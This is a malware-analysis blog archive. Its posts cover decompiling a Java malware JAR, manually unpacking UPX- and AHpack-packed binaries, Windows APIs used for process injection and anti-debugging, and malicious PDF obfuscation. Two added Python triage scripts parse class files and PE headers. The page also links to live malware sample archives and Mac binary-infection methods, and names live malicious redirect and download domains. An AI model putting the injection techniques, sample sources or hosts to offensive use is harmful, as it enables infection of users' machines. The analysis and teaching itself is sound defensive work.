Showing posts with label Malware Analysis.

Sunday, February 22, 2015

Java Malware: Java Decompilers for JAR Malware Analysis

Krakatau comes with three tools: an assembler, a disassembler and a decompiler.
From the author of Krakatau, Robert Grosse:
"The Krakatau decompiler takes a different approach to most Java decompilers. It can be thought of more as a compiler whose input language is Java bytecode and whose target language happens to be Java source code. Krakatau takes in arbitrary bytecode, and attempts to transform it to equivalent Java code. This makes it robust to minor obfuscation, though it has the drawback of not reconstructing the "original" source, leading to less readable output than a pattern matching decompiler would produce for unobfuscated Java classes."

decompile.py can extract the class files from a .jar file and decompile each extracted .class file to Java source (.java). The command below decompiles a .class file to a .java file and places it in the praveendecompile directory.
$ python decompile.py -path . hello.class -out praveendecompile/

Dissecting the command
$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar
-out    output directory
-path   path to core language classes, directories etc.
-skip   continue upon errors

$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar
Krakatau  Copyright (C) 2012-14  Robert Grosse
This program is provided as open source under the GNU General Public License.
See LICENSE.TXT for more details.
Attempting to automatically locate the standard library...
Found at  /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/lib/rt.jar
processing target plugins/Server, 2 remaining
Loading plugins/Server
Loading java/lang/Object
Loading java/lang/Throwable
Loading java/io/Serializable
Loading java/lang/IllegalMonitorStateException
Loading java/lang/RuntimeException
Loading java/lang/Exception
Decompiling method ()V
Decompiling method onLine ()V
Decompiling method offLine ()V
Decompiling method getId ()Ljava/lang/String;
Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/plugins/Server.java
0.369355201721  seconds elapsed
processing target Main, 1 remaining
Loading Main
Loading java/lang/ClassLoader
Loading java/io/InputStream
Loading java/io/Closeable
Loading java/lang/AutoCloseable
Loading java/io/ByteArrayInputStream
Loading java/io/PrintStream
Loading java/io/FilterOutputStream
Loading java/io/OutputStream
Loading java/io/Flushable
Loading java/lang/Appendable
Loading java/lang/String
Loading java/lang/Comparable
Loading java/lang/CharSequence
Loading java/util/jar/JarInputStream
Loading java/util/zip/ZipInputStream
Loading java/util/zip/InflaterInputStream
Loading java/io/FilterInputStream
Loading java/util/zip/ZipConstants
Loading java/lang/OutOfMemoryError
Loading java/lang/VirtualMachineError
Loading java/lang/Error
Decompiling method iiIiiiiiii ([BLjava/lang/String;)Ljava/util/jar/JarInputStream;
Loading java/util/HashMap
Loading java/util/AbstractMap
Loading java/util/Map
Loading java/lang/Cloneable
Loading java/lang/ClassCastException
Loading java/lang/NullPointerException
Decompiling method getResourceAsStream (Ljava/lang/String;)Ljava/io/InputStream;
Loading java/util/jar/JarEntry
Loading java/util/zip/ZipEntry
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/util/jar/JarEntry;)Ljava/lang/String;
Loading java/lang/ClassNotFoundException
Loading java/lang/ReflectiveOperationException
Loading java/lang/Class
Loading java/lang/reflect/GenericDeclaration
Loading java/lang/reflect/Type
Loading java/lang/reflect/AnnotatedElement
Decompiling method findClass (Ljava/lang/String;)Ljava/lang/Class;
Decompiling method iiIiiiiiii (Ljava/util/jar/JarInputStream;)V
Loading java/io/ByteArrayOutputStream
Decompiling method ()V
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/util/jar/JarInputStream;)Ljava/util/jar/JarEntry;
Decompiling method iiIiiiiiii ()V
Loading java/lang/StackTraceElement
Loading java/lang/StringBuffer
Loading java/lang/AbstractStringBuilder
Loading java/lang/ArrayIndexOutOfBoundsException
Loading java/lang/IndexOutOfBoundsException
Loading java/lang/NegativeArraySizeException
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;)Ljava/lang/String;
Loading java/lang/reflect/Method
Loading java/lang/reflect/AccessibleObject
Loading java/lang/reflect/Member
Decompiling method main ([Ljava/lang/String;)V
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;[B)Ljava/lang/Class;
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ()Ljava/io/InputStream;
Loading java/io/Reader
Loading java/lang/Readable
Loading java/io/InputStreamReader
Loading java/io/BufferedReader
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/InputStream;)Ljava/lang/String;
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/ByteArrayOutputStream;)[B
Decompiling method loadClass (Ljava/lang/String;)Ljava/lang/Class;
Loading java/lang/StringBuilder
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ([BLjava/lang/String;)[B
Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/Main.java
15.0299580097  seconds elapsed

*********************************************************

The important parts of the decompilation are highlighted above.

The decompilation above creates a couple of files under the temp_praveen directory:
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau/temp_praveen$
$ ls -R
Main.java  plugins
./plugins:
Server.java

Rename 2f8d204b747ed971a8bc8927b2e0898c.jar to 2f8d204b747ed971a8bc8927b2e0898c.zip and unzip the zip file (unzip on the .jar file directly might work, I did not try it though).
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$
$ unzip 2f8d204b747ed971a8bc8927b2e0898c.zip 
Archive:  2f8d204b747ed971a8bc8927b2e0898c.zip
  inflating: META-INF/MANIFEST.MF    
  inflating: MANIFEST.MF             
  inflating: ID                      
  inflating: plugins/Server.class    
  inflating: Main.class              
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$

disassemble.py takes a class or jar file as input and converts it to Krakatau's assembly format; the output is saved to a .j file and can be reassembled. If a jar file is given as input it disassembles all the class files in the jar into .j files.
python disassemble.py Main.class

$ python ../disassemble.py Main.class 
processing target Main.class, 1/1 remaining
Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/Main.j
0.280933856964  seconds elapsed

The javap binary is included with the JDK installation; javap can be used to see the bytecode of a class:
$ javap -c Main.class

assemble.py converts a bytecode assembly file (.j) back to a class file in the JVM class file format.
python assemble.py Main.j

$ python ../../assemble.py Server.j
Processing file Server.j, 1/1 remaining
Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/plugins/Server.class

Java malware might use different obfuscation techniques to make analysis difficult for malware analysts and detection devices. Errors encountered during decompilation might need to be fixed manually.
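As an added example (not part of the post or of Krakatau), a small Python triage script that reads the class files inside a JAR directly, without a decompiler, and flags the obfuscated member names seen in the log above; the sample JAR and class it parses are constructed inline, and the name patterns are assumptions drawn from this log, not a general obfuscator signature.

```python
"""Constant-pool triage of class files pulled out of a JAR: parse the JVM class file
layout (magic, constant pool, field/method tables) and flag the member-name patterns
seen in the Krakatau log above ('ALLATORIxDEMOx...' and look-alikes such as 'iiIiiiiiii')."""
import collections
import io
import re
import struct
import zipfile

# Payload size of the fixed-width constant pool entries, keyed by tag (JVM spec 4.4).
_FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
          15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
OBFUSCATED_NAME = re.compile(r"^(ALLATORIxDEMOx\w+|[iIl]{6,})$")   # assumed patterns

def parse_class(data):
    """Return class/super names plus (name, descriptor) pairs of fields and methods."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a JVM class file")
    pos = 8                                            # magic + minor/major version
    (count,) = struct.unpack_from(">H", data, pos); pos += 2
    pool, i = [None] * count, 1                        # slot 0 is unused by the JVM
    while i < count:
        tag = data[pos]; pos += 1
        if tag == 1:                                   # CONSTANT_Utf8: u2 length + bytes
            (n,) = struct.unpack_from(">H", data, pos)
            pool[i] = (tag, data[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        elif tag in _FIXED:                            # Class entries keep their Utf8 index
            pool[i] = (tag, struct.unpack_from(">H", data, pos)[0] if tag == 7 else None)
            pos += _FIXED[tag]
        else:
            raise ValueError("unknown constant pool tag %d at offset %d" % (tag, pos - 1))
        i += 2 if tag in (5, 6) else 1                 # long/double occupy two slots
    utf8 = lambda idx: pool[idx][1]
    cls = lambda idx: utf8(pool[idx][1]) if idx else None   # super_class 0 only for Object
    _, this_idx, super_idx, n_if = struct.unpack_from(">HHHH", data, pos)
    pos += 8 + 2 * n_if                                # skip access flags and interface list
    members = []
    for _ in range(2):                                 # fields first, then methods: same layout
        (n,) = struct.unpack_from(">H", data, pos); pos += 2
        group = []
        for _ in range(n):
            _, name_idx, desc_idx, n_attr = struct.unpack_from(">HHHH", data, pos); pos += 8
            for _ in range(n_attr):                    # attribute: u2 name, u4 length, bytes
                (alen,) = struct.unpack_from(">I", data, pos + 2); pos += 6 + alen
            group.append((utf8(name_idx), utf8(desc_idx)))
        members.append(group)
    return {"class": cls(this_idx), "super": cls(super_idx),
            "fields": members[0], "methods": members[1]}

def obfuscation_hints(info):
    """Map each suspicious member name to the number of members carrying it."""
    names = collections.Counter(n for n, _ in info["fields"] + info["methods"])
    return {n: c for n, c in names.items() if OBFUSCATED_NAME.match(n)}

def triage_jar(jar_bytes):
    """Report the manifest Main-Class and the hints for every .class entry of a JAR."""
    report = {"main_class": None, "classes": {}}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        if "META-INF/MANIFEST.MF" in zf.namelist():
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Main-Class:\s*(\S+)", manifest, re.M)
            report["main_class"] = m.group(1) if m else None
        for name in zf.namelist():
            if name.endswith(".class"):
                report["classes"][name] = obfuscation_hints(parse_class(zf.read(name)))
    return report

def build_sample_class():
    """Constructed input (not the page's sample): a minimal Main.class, no code attributes,
    whose method names copy the patterns from the log above."""
    pool = []
    def utf8(s):
        pool.append(b"\x01" + struct.pack(">H", len(s)) + s.encode()); return len(pool)
    def klass(s):
        idx = utf8(s); pool.append(b"\x07" + struct.pack(">H", idx)); return len(pool)
    this_idx, super_idx, desc = klass("Main"), klass("java/lang/ClassLoader"), utf8("()V")
    names = ["main", "ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd",
             "ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd", "iiIiiiiiii"]
    methods = b"".join(struct.pack(">HHHH", 1, utf8(n), desc, 0) for n in names)
    return (b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 51, len(pool) + 1) + b"".join(pool)
            + struct.pack(">HHHH", 0x21, this_idx, super_idx, 0)
            + struct.pack(">HH", 0, len(names)) + methods + struct.pack(">H", 0))

def build_sample_jar():
    """Constructed JAR: the sample class plus a manifest naming it as Main-Class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\nMain-Class: Main\r\n")
        zf.writestr("Main.class", build_sample_class())
    return buf.getvalue()
```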

http://research.zscaler.com/2013/08/malicious-jar-files-hosted-on-google.html
http://stackoverflow.com/questions/27340147/how-to-decompile-class-and-jar-file-using-storyyeller-krakatau
https://github.com/Storyyeller/Krakatau/blob/master/README.TXT
https://raw.githubusercontent.com/Storyyeller/Krakatau/master/Documentation/assembler.txt

Tuesday, August 5, 2014

Manual Unpacking of Compressed Binaries



INTRODUCTION
In this article we will walk through manual unpacking of protected malicious Windows binaries using OllyDBG. We also need to rebuild the Import Address Table (IAT) to restore the file to an executable state. Most anti-virus (AV) vendors flag PE packers as malicious software. There are many varieties of packers available, for example ASPack, UPX, NsPack, Armadillo, Themida etc.

PACKERS
Packers reduce the physical size of an executable by compressing it and combining the compressed data with a decompression stub into a single binary. At runtime, the decompression stub expands the original application and transfers control to the original entry point (OEP).

One of the methods that can be used to locate the original entry point (OEP) of the file is to apply break points on the following APIs:
GetLoadLibraryA
GetVersionExA
GetEnvironmentA
LoadLibraryA
GetProcAddress
IniHeap
These APIs are called by the packer's start-up routine.

The following articles explain manual unpacking of UPX and AHpack:
http://blog.disects.com/2013/12/manual-unpacking-of-upx-packed-binary.html
http://blog.disects.com/2013/12/manual-unpacking-of-ahpack01.html
  
REFERENCES

Friday, May 2, 2014

Windows API's used by Malware

The Windows APIs below are frequently used by malware, though this is not an exhaustive list.

Anti-debugging Techniques
kernel32.CloseHandle
kernel32.GetTickCount
Check whether the byte at offset 0x02 (IsDebugged) in the PEB is set (debugged) or not
Check the NtGlobalFlags field at offset 0x68 in the PEB

kernel32.GetProcAddress
kernel32.LoadLibraryA
kernel32.OpenProcess - get a handle to a given process
kernel32.VirtualAllocEx - reserve memory within the virtual address space of a process
kernel32.CreateRemoteThread - create a thread (inside another process)

FindResource
LockResource
ShellExecute
GetThreadContext
CreateProcessA
ReadProcessMemory
WriteProcessMemory
NtQueueApcThread
CreateToolhelp32Snapshot
Thread32First
Thread32Next
SetWindowsHookEx
NtSetSystemInformation
CreateFile

File handling functions
Registry handling function
Network communication APIs

Tutorial for learning Malware analysis
https://noppa.aalto.fi/noppa/kurssi/t-110.6220/luennot

Wednesday, December 18, 2013

Manual Unpacking of UPX Packed Binary File

FileName: calc.exe
MD5: 829e4805b0e12b383ee09abdc9e2dc3c
File Size: 114688
Source: C:\WINDOWS\system32
OS Used: Windows XP Pro SP3 (English)

Create a UPX-packed binary using the command below
upx -9 -o calc_upx9.exe calc.exe
File size after packing is 57856 bytes

Packer Info


Let's start unpacking: load the file into OllyDBG. OllyDBG detects and warns about the packer; ignore the message (click NO).

0x01020250  is the current Entry Point
01020250  60               PUSHAD

Real OEP = OEP find in Olly - Image Base
Real OEP = 0x01020250 - 0x01000000

After ignoring the warning, step over (F8) PUSHAD, right click on ESP (0x0006FFA4) and follow in dump.
PUSHAD pushes the values of all the general-purpose registers onto the stack.


In the dump window select the first 2/4 bytes and set a hardware breakpoint on access as shown below. The first 4 bytes selected are the value of the EDI register on the stack, in little-endian format.

Run the binary (F9) after setting the breakpoint; execution stops when the breakpoint is hit (0x010203CE). When the breakpoint is hit the CPU window shows
010203CD   61               POPAD
010203CE   8D4424 80        LEA EAX,DWORD PTR SS:[ESP-80]
010203D2   6A 00            PUSH 0
010203D4   39C4             CMP ESP,EAX
010203D6  ^75 FA            JNZ SHORT calc_upx.010203D2
010203D8   83EC 80          SUB ESP,-80
010203DB  -E9 9520FFFF      JMP calc_upx.01012475

Put a breakpoint at 0x010203DB (the first JMP instruction after POPAD), press F9 and, when we hit the breakpoint, single step (F8) once from the JMP; we land at
01012475   6A 70            PUSH 70
01012477   68 E0150001      PUSH calc_upx.010015E0

Right click on 0x01012475 and choose "Dump debugged process", copy the value in the Modify text box (which is our OEP) and click on the Dump button, which creates a new binary (dump_test.exe here).

dump_test.exe is not executable since it doesn't have a proper Import Address Table (IAT). Executing the binary throws the error below.


Load the original binary (calc.exe) into ImportREC and paste the OEP copied from the Modify text field when creating the dump file. Click on AutoSearch to search for the IAT automatically. It gives the log message below:
Original IAT RVA found at: 0000120C in Section RVA: 00001000 Size:00018000

Now click on GetImports, which prints the log below if everything goes fine.
IAT read successfully.
------------------------------------------------
Current imports:
6 (decimal:6) valid module(s) (added: +6 (decimal:+6))
84 (decimal:132) imported function(s). (added: +84 (decimal:+132))

Now click on FixDump and select dump_test.exe; ImportREC fixes dump_test.exe and creates a new file dump_test_.exe, see the logs below:
*** New section added successfully. RVA:00029000 SIZE:00001000
Image Import Descriptor size: 78; Total length: 908
C:\Documents and Settings\praveen\Desktop\UnpackMe\upx_calc\dump_test_.exe saved successfully.

To cross-verify, load the newly created file into PEiD.

Done :-) !!! 

Manual unpacking of AHpack can be found at


Tuesday, December 17, 2013

Manual Unpacking of AHpack(0.1) Packed Binary File

File Information
FileName: UnPackMe_!EP(EXE Pack)1.2.exe
MD5: c39d13643796db07eb9c3c90b3db71d0
File Size: 281088
Source: tuts4u
OS Used: Windows XP Pro SP3 (English)

Packer Information
Packer details can be found using tool "Detect It Easy".


Packed Binary Entry Point
Launch the binary in a debugger; I am using Immunity Debugger v1.85. Immunity alerts you that the binary might be compressed; ignore the message (click NO) and proceed. We can see the entry point as
Address        Opcode       Instruction
0046B0FF    60               PUSHAD


PUSHAD
Step into (F7) or step over (F8) the PUSHAD instruction. PUSHAD pushes the values of all the general-purpose registers onto the stack, except EIP.

Hardware Breakpoint On Access
Right click on the ESP (0x0012FFA4) register and click on "Follow in Dump"; in the dump window select the initial 2 or 4 bytes, right click and choose "Breakpoint -> Hardware, on access -> Dword". This creates a hardware breakpoint.
We can also execute "hr esp-4" in the command bar to set the breakpoint.
"Follow in Dump" shows the register values in little-endian form (EDI might be the first value) on top of the stack.

0046B299   61               POPAD
0046B29A   BA B0714200      MOV EDX,UnPackMe.004271B0
0046B29F  -FFE2             JMP EDX                          ; UnPackMe.004271B0



Hits Breakpoint
Execute the binary, i.e. hit the F9 key. This should break at the instruction after POPAD. Why break here? Because the POPAD executed just before accesses the memory marked with the breakpoint. Single step (F7) until you execute the first jump instruction (at 0x0046B29F), which actually takes us to the OEP, and continue single stepping until we see the instructions below, which show the creation of the stack frame.
004271B0   55               PUSH EBP
004271B1   8BEC             MOV EBP,ESP
0x004271B0 is the Original Entry Point. The long jump from 0x0046B29F to 0x004271B0 is a fair sign that we have reached the OEP.

Dump the process by right clicking at 0x004271B0   (PUSH EBP).


Dump Process
A window pops up as shown; click on Dump and save it as dump.exe. Executing this file might throw a "...not a valid Win32 Application" error because it doesn't have a valid Import Address Table (IAT).

Fix Dumped Process
Image Base + OEP = Start Offset
Let's fix the IAT: start the "Import REC" tool and select the original binary which we are trying to unpack. Modify the OEP to 0x000271B0 and click on AutoSearch, ignoring the pop-up warning (click OK).
The IAT AutoSearch feature is used to find the right references to the API calls. Click on "Get Imports" to get the imports; there should not be any errors (see the snapshot below).


Now click on "Fix Dump" and provide the dump.exe created in one of the steps above. If successful, it creates an unpacked binary dump_.exe.

Execute the binary by double clicking it; if it runs without error, boom, our unpacking is done !!

The steps can be summarized as

  • Execution starts from the packer's new entry point (a newly added code section located at the end of the binary)
  • Saves the current register state using the PUSHAD (opcode 60) instruction
  • All the packed sections are unpacked in memory
  • Resolves the import table of the original executable
  • Restores the original register state using the POPAD (opcode 61) instruction
  • Finally jumps to the Original Entry Point to begin the actual execution
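As an added example (not from either post), a Python script that does the OEP arithmetic of the UPX post ("Real OEP = OEP found in Olly - Image Base") and the AHpack post ("Image Base + OEP = Start Offset") from the PE headers rather than the debugger, and reports the packer tells both posts rely on; the PE it parses is constructed inline and only mimics the calc_upx9.exe layout.

```python
"""Static counterpart of the debugger steps above: compute the entry-point VA the
debugger shows (ImageBase + AddressOfEntryPoint), map it back to a file offset via
the section table, and note the packer tells used in both posts: PUSHAD (0x60) as
the first instruction, UPX section names, and a first section with no raw data
but a large virtual size (the decompression target)."""
import struct

SECTION_HDR = 40   # size of one IMAGE_SECTION_HEADER

def parse_pe(data):
    """Return image base, entry RVA and section table of a PE32/PE32+ file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (size_opt,) = struct.unpack_from("<H", data, e_lfanew + 20)
    opt = e_lfanew + 24                             # optional header follows the COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)
    if magic == 0x10B:                              # PE32
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:                            # PE32+
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(n_sections):
        off = opt + size_opt + i * SECTION_HDR
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize, "rawptr": rawptr})
    return {"image_base": image_base, "entry_rva": entry_rva, "sections": sections}

def section_of(rva, sections):
    """Section whose virtual range contains the RVA, or None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None

def rva_to_offset(rva, sections):
    """File offset backing an RVA; None when the bytes only exist at runtime (e.g. UPX0)."""
    s = section_of(rva, sections)
    if s is None or rva - s["va"] >= s["rawsize"]:
        return None
    return s["rawptr"] + (rva - s["va"])

def oep_rva(debugger_va, image_base):
    """The 'Real OEP' of the posts: address seen in the debugger minus the image base."""
    return debugger_va - image_base

def entry_point_report(data):
    """Entry-point facts and packer hints for one PE image."""
    pe = parse_pe(data)
    secs, rva = pe["sections"], pe["entry_rva"]
    sec, off = section_of(rva, secs), rva_to_offset(rva, secs)
    first = data[off] if off is not None and off < len(data) else None
    hints = []
    if first == 0x60:
        hints.append("entry point starts with PUSHAD (0x60): register save of a packer stub")
    if any(s["name"].upper().startswith("UPX") for s in secs):
        hints.append("UPX section names present")
    if secs and secs[0]["rawsize"] == 0 and secs[0]["vsize"] >= 0x1000:
        hints.append("first section has no raw data but 0x%x virtual bytes" % secs[0]["vsize"])
    return {"entry_va": pe["image_base"] + rva, "entry_rva": rva,
            "section": sec["name"] if sec else None, "file_offset": off, "hints": hints}

def build_sample_pe():
    """Constructed input (not calc_upx9.exe): a PE32 with UPX-style layout, ImageBase
    0x01000000 and entry RVA 0x20250 whose first byte is PUSHAD, as in the UPX post."""
    secs = [(b"UPX0", 0x1F000, 0x1000, 0, 0x400),   # name, vsize, va, rawsize, rawptr
            (b"UPX1", 0x1000, 0x20000, 0x400, 0x400),
            (b".rsrc", 0x200, 0x21000, 0x200, 0x800)]
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\0")
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x20250)         # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x01000000)      # ImageBase
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, 0x60000020)
                    for n, vs, va, rs, rp in secs)
    image = bytearray((dos + coff + bytes(opt) + hdrs).ljust(0xA00, b"\0"))
    image[0x400 + 0x250] = 0x60                      # PUSHAD at the file offset of the entry RVA
    return bytes(image)
```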

Thursday, May 3, 2012

Mac OS X Infector and Research Resources/Links

These are the links/resources collected by one of my friends, Sandeep, for his research purposes and shared with me. Most of them are worth reading. Hope this helps someone somewhere gain some knowledge........ !!!


HTE -- File manipulator
http://hte.sourceforge.net/

Mach-O filetype and infection methods
http://felinemenace.org/~nemo/slides/mach-o_infection.ppt

Same idea, different author
http://vx.netlux.org/lib/vrg01.html

Method Swizzling (you can remap the function name pointer to binary code mapping on OS-X)
http://www.cocoadev.com/index.pl?MethodSwizzling

Class Posing!
http://www.cocoadev.com/index.pl?ClassPosing
http://www.stepwise.com/Articles/Technical/PosersAndCategories/index.html

OS-X Tools:
otool -- Object File Displaying Tool http://developer.apple.com/mac/library/documentation/Darwin/Reference/ManPages/man1/otool.1.html

gdb -- GNU Debugger (part of GCC)
http://developer.apple.com/tools/gcc_overview.html

gas -- host spoofing manager
http://www.apple.com/downloads/macosx/development_tools/gasmask.html

libtool -- Create Libraries
http://developer.apple.com/mac/library/documentation/Darwin/Reference/ManPages/man1/libtool.1.html

file -- File Typer
http://linux.die.net/man/1/file

ktrace -- Kernel Trace Logging for a process
System Calls, Name Translations, Signal Processing, I/O

dtrace -- Debugger/Tracer in 10.5+
http://www.mactech.com/articles/mactech/Vol.23/23.11/ExploringLeopardwithDTrace/index.html

http://www.macosxhints.com/article.php?story=20071031121823710

kdump -- Kernel Dump Reader

class-dump -- Examines Objective-C Runtime data for MachO files.
http://codethecode.com/projects/class-dump/

Summary of other useful tools:
http://osxbook.com/book/bonus/ancient/whatismacosx/tools.html


Other interesting links are most welcome. I can update the post if there are any interesting links.

Thursday, February 23, 2012

URL's to Learn Malware Analysis, RCE

The following links will be pretty useful to learn Malware Analysis, Reverse Code Engineering (RCE) etc.

http://forum.tuts4you.com/index.php
http://www.woodmann.com/TiGa/idaseries.html
http://www.openrce.org/articles/
http://www.kernelmode.info/forum/index.php
http://crackmes.de/

Debugging Book
http://advancedwindowsdebugging.com/portal/portal_downloads.htm


Step 1: Learn C/C++/Delphi etc. You can't reverse engineer if you can't forward engineer.
Step 2: Learn x86 assembly - http://opensecuritytraining.info/IntroX86.html (includes videos)
Step 3: Learn x86 architecture - http://opensecuritytraining.info/IntermediateX86.html (includes videos)
Step 4: Learn PE binary format - http://opensecuritytraining.info/LifeOfBinaries.html (includes videos)
Step 5: Learn about IDA & general RE thought process - http://opensecuritytraining.info/IntroductionToReverseEngineering.html (video pending)
Step 6: Learn about some stealth malware techniques - http://opensecuritytraining.info/Rootkits.html (includes videos)
Step 7: Learn more by encouraging other people to submit their own class material - http://opensecuritytraining.info/Why.html
http://opensecuritytraining.info/Training.html

check it out: http://www.accessroot.com/arteam/site/news.php
another awesome tuts: http://portal.b-at-s.net/download.php

Some Sites
http://j00ru.vexillium.org/
http://www.analyze-v.com/
http://byteworm.com/
http://blog.zemana.com/2012/05/kaynaklar.html
http://fumalwareanalysis.blogspot.in/p/malware-analysis-tutorials-reverse.html
http://thelegendofrandom.com/blog/sample-page
http://beginners.re/

Live Malware Samples
http://www.offensivecomputing.net/
http://www.malwaredomainlist.com/
http://www.malc0de.org/database
http://www.virussign.com/index.html
http://www.vx.netlux.org/
http://openmalware.org/
http://virusshare.com/
https://twitter.com/MalwareChannel 
http://www.vxheavens.com/
http://malshare.com/
https://avcaesar.malware.lu/
http://www.malwareblacklist.com/showMDL.php
https://malwr.com/
http://secuboxlabs.fr/
http://www.virusign.com/

Other useful sources
http://zeltser.com/combating-malicious-software/malware-sample-sources.html
http://reverseengineering.stackexchange.com/questions/206/where-can-i-as-an-individual-get-malware-samples-to-analyze
http://reverseengineering.stackexchange.com/questions/265/where-to-find-free-training-in-reverse-engineering

Suspicious files can be analyzed at
https://www.virustotal.com/

Malicious PDF Files
http://filex.jeek.org/archive_PDF.zip

Android Malware Samples
http://contagiodump.blogspot.in/
http://www.malgenomeproject.org/

For Mac OS X related resources, refer
http://darshanams.blogspot.in/2012/05/mac-os-x-infector-and-research.html

Tools
IDA/Olly/WinDBG
ImpREC
LordPE
Sysinternal's Tool Suite
Exeinfo PE/ PEiD
PEstudio
CFF Explorer
FileAlyzer
PEview

Let me know new sites, will update the same here :-) !!!

Thursday, September 8, 2011

Malicious PDF: Portable Document Files Compression/Encoding/Obfuscation

Malicious PDFs, used to infect computers with malware or execute code when the PDF file is opened, have increased manifold. We will see various ways in which JavaScript embedded within PDFs can be compressed or encoded to evade detection by IDS/IPS and anti-virus. Many PDF parsers crash while analyzing a malicious/malformed file, but Adobe Reader successfully opens the file, which leads to infection.

Below is the malicious PDF file viewed in text editor.



PDF parsers might have issues analyzing the following abnormal files:
1. Portable Document File Format does not strictly abide by its specification.
2. PDF version might be malformed (NULL value, incomplete value etc.) (can be seen in the above pic)
3. May not contain endobj or endstream (at least one of the strings should be present within an object)
4. May not contain an xref table
5. Names may be encoded (/JavaScript as /J#61vaScript).
6. No %%EOF marker
7. There might be multiple %%EOF markers or trailers, indicating incremental updates.
8. PDF embedded within another PDF (same object numbers in a single file).
9. Different types of Evasions/ Encoding can be found at

The different encoding/compression filter types are
/FlateDecode
/ASCIIHexDecode
/ASCII85Decode
/JBIG2Decode
/LZWDecode
/RunLengthDecode
/CCITTFaxDecode
/DCTDecode
/JPXDecode
This might not be the full list of filters (not sure).

The snapshot below shows a highly obfuscated PDF file.



Good articles related to PDF's can be found at

For quick analysis of a PDF file you can upload to
http://wepawet.cs.ucsb.edu/

Live malicious PDF files can be found at
http://filex.jeek.org/archive_PDF.zip
Please do not open files in the archive with any of the PDF readers.

Following articles might be of your interest
http://darshanams.blogspot.in/2012/05/cain-and-abel-password-cracking.html
http://darshanams.blogspot.in/2010/09/forensics-1-extracting-image.html
http://darshanams.blogspot.in/2011/05/snort-logging-alerts-to-syslog-server.html

Comments are most welcome :) !!!

Friday, October 9, 2009

Premier University of Andhra Pradesh Serving Malware.

A couple of days back I reported the infection to a few security researchers through OWASP. Now Firefox and Google say the same!! If we visit http://www.nagarjunauniversity.ac.in/, the Firefox browser alarms you with the following warning

Another way to make sure whether it is serving malicious pages or malware is to type "nagarjunauniversity" into the Google search box and open the first link.

Google description about the pages hosted by www.nagarjunauniversity.ac.in is

Real-time view of the malicious pages and analysis
Visiting the site welcomes you with script execution, see the diagram below.
Viewing the source of this page will make you think for a while. Why are Chinese and Russian links present in the page?? Have a glimpse of the code.


When I reported the incident on OWASP, base64 encoded code was present on this page. Don't worry, the code is still present but on other pages. When I am writing this blog, base64 encoded content was present on the following pages and many more
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
The source code of either of the pages looks like
If you observe carefully we can see a site which is partially encoded (percent encoding)
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description had a mention of the bale.ws domain.
When we open the above site it gets redirected to
http://superpupermegacasino.com/ which hosts *SmartDownload.exe*

VirusTotal shows the details of the EXE as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/analisis/9709a6f32be02642671f96ee264bae85fc924072ceb1a6f07c94ab94ae77943d-1254763534

